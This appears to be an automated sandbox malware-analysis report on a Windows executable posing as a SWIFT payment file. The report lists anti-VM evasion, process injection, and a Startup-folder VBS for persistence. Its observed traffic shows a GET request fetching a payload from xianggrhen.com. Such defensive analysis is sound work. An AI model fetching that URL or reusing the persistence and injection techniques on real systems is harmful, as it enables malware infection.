Edit tour

Windows Analysis Report
10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Overview

General Information

Sample name:	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Analysis ID:	1572323
MD5:	1fbbb69b38cbd11f090850b982edc780
SHA1:	7353eebc22d5cb040cbcda1fd357d0ec157befb0
SHA256:	a98c622c391535dc0aabd1f8dfb186f92804d8a81e46ebdd44d8597b863112fa
Tags:	exeSWIFTuser-cocaman
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Drops VBS files to the startup folder

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe" MD5: 1FBBB69B38CBD11F090850B982EDC780)

10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe (PID: 5280 cmdline: "C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe" MD5: 1FBBB69B38CBD11F090850B982EDC780)

WerFault.exe (PID: 7148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1172 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2341292549.00000000060D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2320521719.00000000030C7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe PID: 6600	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe PID: 6600	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe PID: 5280	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.60d0000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, ProcessId: 6600, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSImagingNet14_0-setup.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe

ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Joe Sandbox ML: detected

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3277577960.0000000004DE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb`o source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb= source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbu source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbxX source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb3o source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_01511984
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 4x nop then jmp 06347FAFh	0_2_06347C00
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 4x nop then jmp 06348592h	0_2_06348338
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 4x nop then jmp 06348592h	0_2_06348348
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 4x nop then jmp 06347FAFh	0_2_06347BCF

Source: global traffic

HTTP traffic detected: GET /composure/Emmaj.vdf HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /composure/Emmaj.vdf HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: xianggrhen.com

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xianggrhen.com
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: http://xianggrhen.com/composure/Emmaj.vdf
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	String found in binary or memory: https://www.vintasoft.com

System Summary

.NET source code contains very large array initializations

Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.449e0c0.0.raw.unpack, ArgumentFinder.cs

Large array initialization: RateArgument: array initializer size 360992

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_062636B0 NtResumeThread,		0_2_062636B0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_062611D0 NtProtectVirtualMemory,		0_2_062611D0

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05FB0F88	0_2_05FB0F88
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_06216E5B	0_2_06216E5B
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_015122F8	0_2_015122F8
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_01511D59	0_2_01511D59
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_01511D68	0_2_01511D68
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05FD13F0	0_2_05FD13F0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05FD13A5	0_2_05FD13A5
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05FD3C30	0_2_05FD3C30
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B44E0	0_2_060B44E0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B0040	0_2_060B0040
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B0006	0_2_060B0006
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B10B0	0_2_060B10B0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B10C0	0_2_060B10C0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B5AE8	0_2_060B5AE8
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B4807	0_2_060B4807
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060C7878	0_2_060C7878
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060C0006	0_2_060C0006
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060C0040	0_2_060C0040
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060CBCDD	0_2_060CBCDD
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060C7D30	0_2_060C7D30
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060C6D93	0_2_060C6D93
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060C65CB	0_2_060C65CB
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060C65D8	0_2_060C65D8
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_061A6280	0_2_061A6280
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_061AE2F0	0_2_061AE2F0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_061A9120	0_2_061A9120
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_061A6270	0_2_061A6270
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_061AE2E0	0_2_061AE2E0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_061A91A7	0_2_061A91A7
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_06349E80	0_2_06349E80
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_06349E6F	0_2_06349E6F
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_0634C2F0	0_2_0634C2F0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_0634C2E1	0_2_0634C2E1
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_06344318	0_2_06344318
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_0634D8D8	0_2_0634D8D8
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_0634D8C8	0_2_0634D8C8
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_064BEFD8	0_2_064BEFD8
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_064A0040	0_2_064A0040
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_064A0006	0_2_064A0006
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05FD3C10	0_2_05FD3C10
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81698	3_2_00E81698
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81410	3_2_00E81410
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E839DD	3_2_00E839DD
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E84D48	3_2_00E84D48
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E84D38	3_2_00E84D38
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81AE8	3_2_00E81AE8
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81AD1	3_2_00E81AD1
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81AB8	3_2_00E81AB8
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81A86	3_2_00E81A86
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81A9F	3_2_00E81A9F
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81A53	3_2_00E81A53
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81A3D	3_2_00E81A3D
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E81A14	3_2_00E81A14
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E813FF	3_2_00E813FF

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1172

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Static PE information: invalid certificate

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: VSImagingNet14_0-setup.exe.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.418d780.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.449e0c0.0.raw.unpack, ArgumentFinder.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.449e0c0.0.raw.unpack, LoggerRunner.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.449e0c0.0.raw.unpack, LoggerRunner.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.3a45a90.2.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.3a45a90.2.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.3a45a90.2.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.5090000.6.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.5090000.6.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.5090000.6.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.expl.evad.winEXE@4/3@1/1

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSImagingNet14_0-setup.vbs

Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:64:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\8cb92558-5d34-4167-9dde-606805270af9

Jump to behavior

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

File read: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe "C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe"
